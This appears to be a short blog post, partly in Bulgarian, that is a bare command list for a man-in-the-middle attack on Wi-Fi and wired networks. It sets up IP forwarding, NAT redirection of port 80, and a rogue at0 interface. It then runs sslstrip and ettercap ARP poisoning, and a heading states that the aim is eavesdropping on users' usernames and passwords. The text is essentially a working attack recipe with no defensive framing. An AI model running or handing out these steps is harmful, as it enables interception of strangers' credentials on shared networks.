iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
ettercap -T -q -i at0
sslstrip -a -k -f
=================wifisnif==========
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
tar -zxvf sslstrip-0.7.tar.gz
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables --list -t nat
echo "1" > /proc/sys/net/ipv4/ip_forward
python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
===================================
podslushvane na user/pass v wlan/eth
===================================
nano /etc/etter.conf
нсталиране на най-новата версия на sslstrip -> http://www.thoughtcrime.org/software/sslstrip/
python ./setup.py install
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward // след стариране на еттер ако се промени на 0 пак се пише
iptables -t nat -A PREROUTING -i waln0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -nvL -t nat
python sslstrip-0.7/sslstrip.py -a -l 8080 или sslstrip -a -l 8080
ettercap -TqM ARP:REMOTE // //
избира се после плугина remote_browser
/etc/sysctl.conf:
net.ipv4.ip_forward = 1
Няма коментари:
Публикуване на коментар